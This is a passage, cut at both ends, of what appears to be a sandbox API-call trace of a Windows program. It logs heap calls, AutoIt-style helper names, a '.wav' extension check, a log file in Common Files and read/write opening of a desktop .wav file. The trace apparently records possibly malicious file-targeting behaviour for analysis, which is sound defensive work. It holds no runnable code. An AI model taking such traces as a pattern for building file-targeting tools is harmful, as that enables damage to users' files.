returned 1 [0029.513] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0029.513] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1a08 | out: hHeap=0x770000) returned 1 [0029.513] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc58 | out: hHeap=0x770000) returned 1 [0029.513] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c748 | out: hHeap=0x770000) returned 1 [0029.513] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1648 | out: hHeap=0x770000) returned 1 [0029.513] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0029.513] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1648 [0029.514] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c748 [0029.514] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af478 [0029.514] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc58 [0029.514] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5c8 [0029.514] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae928 [0029.514] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8895c8 [0029.514] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5e8 [0029.514] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab260 [0029.514] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8895c8 | out: hHeap=0x770000) returned 1 [0029.514] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae928 | out: hHeap=0x770000) returned 1 [0029.514] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0029.514] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0029.514] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8895c8 [0029.514] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af478 [0029.514] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5c8 [0029.514] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b45c8 [0029.514] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0029.514] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b45c8 | out: hHeap=0x770000) returned 1 [0029.514] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0029.514] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a08 [0029.514] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7af5c8 [0029.514] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b16e8 [0029.514] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897d8 [0029.514] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af338 [0029.514] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889aa8 [0029.514] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0029.514] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x889778 [0029.514] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1698 [0029.514] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdf0 [0029.514] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af338 [0029.514] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdf0 | out: hHeap=0x770000) returned 1 [0029.514] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b16c0 [0029.515] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdf0 [0029.515] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cee0 [0029.515] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab338 [0029.515] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0029.515] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1dc8 [0029.515] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899b8 [0029.515] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af348 [0029.515] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899b8 | out: hHeap=0x770000) returned 1 [0029.515] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1710 [0029.515] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899b8 [0029.515] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc88 [0029.515] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af368 [0029.515] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc88 | out: hHeap=0x770000) returned 1 [0029.515] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1940 [0029.515] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc88 [0029.515] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af598 [0029.515] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c730 [0029.515] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0029.515] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896b8 [0029.515] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af598 [0029.515] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889970 [0029.515] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0029.515] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a60 [0029.515] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af598 [0029.515] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0029.515] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdc0 [0029.515] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af598 [0029.515] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3f8 [0029.515] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0029.515] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0029.515] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="v", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0029.515] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="av", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0029.516] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="wav", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0029.516] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".wav", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0029.516] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c730 | out: hHeap=0x770000) returned 1 [0029.516] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc88 | out: hHeap=0x770000) returned 1 [0029.516] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889970 | out: hHeap=0x770000) returned 1 [0029.516] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896b8 | out: hHeap=0x770000) returned 1 [0029.516] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a60 | out: hHeap=0x770000) returned 1 [0029.516] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdc0 | out: hHeap=0x770000) returned 1 [0029.516] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1940 | out: hHeap=0x770000) returned 1 [0029.516] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0029.516] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0029.516] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af368 [0029.516] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af598 [0029.516] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0029.516] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0029.516] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0029.516] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1940 [0029.516] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdc0 [0029.516] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af368 [0029.516] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdc0 | out: hHeap=0x770000) returned 1 [0029.516] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1af8 [0029.516] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdc0 [0029.516] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a60 [0029.516] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af598 [0029.516] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a60 | out: hHeap=0x770000) returned 1 [0029.516] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1788 [0029.516] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a60 [0029.516] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3f8 [0029.516] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896b8 [0029.516] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0029.516] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889970 [0029.516] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3f8 [0029.516] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1c60 [0029.516] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc88 [0029.516] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5b8 [0029.517] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c730 [0029.517] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0029.517] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c730 | out: hHeap=0x770000) returned 1 [0029.517] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc88 | out: hHeap=0x770000) returned 1 [0029.517] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1c60 | out: hHeap=0x770000) returned 1 [0029.517] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5b8 [0029.517] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5f8 [0029.517] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae928 [0029.517] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4b8 [0029.517] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae948 [0029.517] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0029.517] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0029.517] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae948 | out: hHeap=0x770000) returned 1 [0029.517] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae928 | out: hHeap=0x770000) returned 1 [0029.517] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0029.517] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0029.517] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc88 [0029.517] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3f8 [0029.517] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c730 [0029.517] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896b8 | out: hHeap=0x770000) returned 1 [0029.517] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a60 | out: hHeap=0x770000) returned 1 [0029.517] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889970 | out: hHeap=0x770000) returned 1 [0029.517] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1788 | out: hHeap=0x770000) returned 1 [0029.517] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0029.517] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0029.517] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af598 [0029.517] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1788 [0029.517] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889970 [0029.517] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5b8 [0029.517] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a60 [0029.517] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0029.517] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896b8 [0029.517] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5b8 [0029.517] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5f8 [0029.518] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae928 [0029.518] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae928 | out: hHeap=0x770000) returned 1 [0029.518] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0029.518] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0029.518] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889958 [0029.518] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5b8 [0029.518] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889958 | out: hHeap=0x770000) returned 1 [0029.518] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x80) returned 0x7d5c40 [0029.518] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889958 [0029.518] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a60 | out: hHeap=0x770000) returned 1 [0029.518] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889970 | out: hHeap=0x770000) returned 1 [0029.518] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896b8 | out: hHeap=0x770000) returned 1 [0029.518] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1788 | out: hHeap=0x770000) returned 1 [0029.518] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0029.518] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889958 | out: hHeap=0x770000) returned 1 [0029.518] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0029.518] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af598 [0029.518] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889958 [0029.518] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0029.518] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896b8 [0029.518] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889958 | out: hHeap=0x770000) returned 1 [0029.518] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889958 [0029.518] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896b8 | out: hHeap=0x770000) returned 1 [0029.518] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab338 | out: hHeap=0x770000) returned 1 [0029.518] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899b8 | out: hHeap=0x770000) returned 1 [0029.518] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1710 | out: hHeap=0x770000) returned 1 [0029.518] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0029.518] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1dc8 | out: hHeap=0x770000) returned 1 [0029.518] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc88 | out: hHeap=0x770000) returned 1 [0029.518] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0029.518] CreateFileW (lpFileName="C:\\PROGRA~2\\COMMON~1\\log.txt" (normalized: "c:\\progra~2\\common~1\\log.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0029.519] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0029.519] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee24 | out: lpNewFilePointer=0x0) returned 1 [0029.519] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0029.519] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee04 | out: lpNewFilePointer=0x0) returned 1 [0029.519] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5c8 [0029.519] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10000) returned 0x89ffb8 [0029.519] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af368 [0029.519] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee14 | out: lpNewFilePointer=0x0) returned 1 [0029.519] ReadFile (in: hFile=0x140, lpBuffer=0x88ffb0, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6aee3c, lpOverlapped=0x0 | out: lpBuffer=0x88ffb0*, lpNumberOfBytesRead=0x6aee3c*=0x48, lpOverlapped=0x0) returned 1 [0029.519] ReadFile (in: hFile=0x140, lpBuffer=0x88ffb0, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6aee3c, lpOverlapped=0x0 | out: lpBuffer=0x88ffb0*, lpNumberOfBytesRead=0x6aee3c*=0x0, lpOverlapped=0x0) returned 1 [0029.519] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x48, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0029.519] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee04 | out: lpNewFilePointer=0x0) returned 1 [0029.519] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0029.519] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0029.519] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0029.520] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0029.520] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0029.520] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af438 [0029.520] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af588 [0029.520] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1508 [0029.520] CharUpperBuffW (in: lpsz="_FILEINUSE", cchLength=0xa | out: lpsz="_FILEINUSE") returned 0xa [0029.520] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0029.520] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af558 [0029.520] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b0c70 [0029.520] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889988 [0029.520] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3e8 [0029.520] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a78 [0029.520] CharLowerBuffW (in: lpsz="hwnd", cchLength=0x4 | out: lpsz="hwnd") returned 0x4 [0029.520] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca48 [0029.520] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af568 [0029.520] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af378 [0029.520] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c760 [0029.520] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0029.520] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca48 [0029.520] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5c8 [0029.520] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0029.520] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xb) returned 0x88c760 [0029.520] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x88c760, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFile", lpUsedDefaultChar=0x0) returned 11 [0029.520] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\32U39klehZ.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\32u39klehz.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0029.520] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5f8 [0029.520] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x214) returned 0x7b8158 [0029.520] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b13c8 [0029.521] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca48 [0029.521] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c760 [0029.521] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ceb0 [0029.521] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af598 [0029.521] FreeLibrary (hLibModule=0x76e10000) returned 1 [0029.521] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0029.521] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5f8 [0029.521] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af368 [0029.521] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0029.521] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b13f0 [0029.521] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c898 [0029.521] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5f8 [0029.521] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889970 [0029.521] CharLowerBuffW (in: lpsz="int", cchLength=0x3 | out: lpsz="int") returned 0x3 [0029.521] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889aa8 [0029.521] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af368 [0029.521] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af478 [0029.521] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897d8 [0029.521] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0029.521] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889aa8 [0029.521] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5e8 [0029.521] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, 